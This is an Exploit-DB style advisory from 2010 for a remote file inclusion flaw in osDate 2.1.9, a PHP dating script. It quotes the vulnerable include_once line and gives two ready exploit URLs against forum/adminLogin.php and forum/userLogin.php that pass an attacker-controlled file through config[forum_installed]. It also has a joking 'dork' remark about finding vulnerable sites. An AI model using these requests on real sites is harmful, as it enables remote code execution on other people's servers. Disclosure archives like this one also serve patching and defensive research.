osDate 2.1.9 - Remote File Inclusion

EDB-ID:

11755


Author:

NoGe

Type:

webapps


Platform:

PHP

Date:

2010-03-15


========================================================================================
[o] osDate Remote File Inclusion Vulnerabilities
Software : osDate dating and matchmaking script version 2.1.9 [mostly affected]
Vendor   : http://www.tufat.com/
Download : http://www.tufat.com/s_free_dating_system.htm
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com
Blog     : http://evilc0de.blogspot.com/
========================================================================================
[o] Vulnerable file
include_once($config['forum_installed'] . "_forum.php");
	forum/adminLogin.php
	forum/userLogin.php
[o] Exploit
       http://localhost/[path]/forum/adminLogin.php?config[forum_installed]=[evilc0de]
       http://localhost/[path]/forum/userLogin.php?config[forum_installed]=[evilc0de]
[o] Dork
       cari ndiri yee.. gampang koq dork na.. :p
========================================================================================
[o] Greetz
       Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella
       H312Y yooogy mousekill }^-^{ noname s4va stardustmemory
       skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
========================================================================================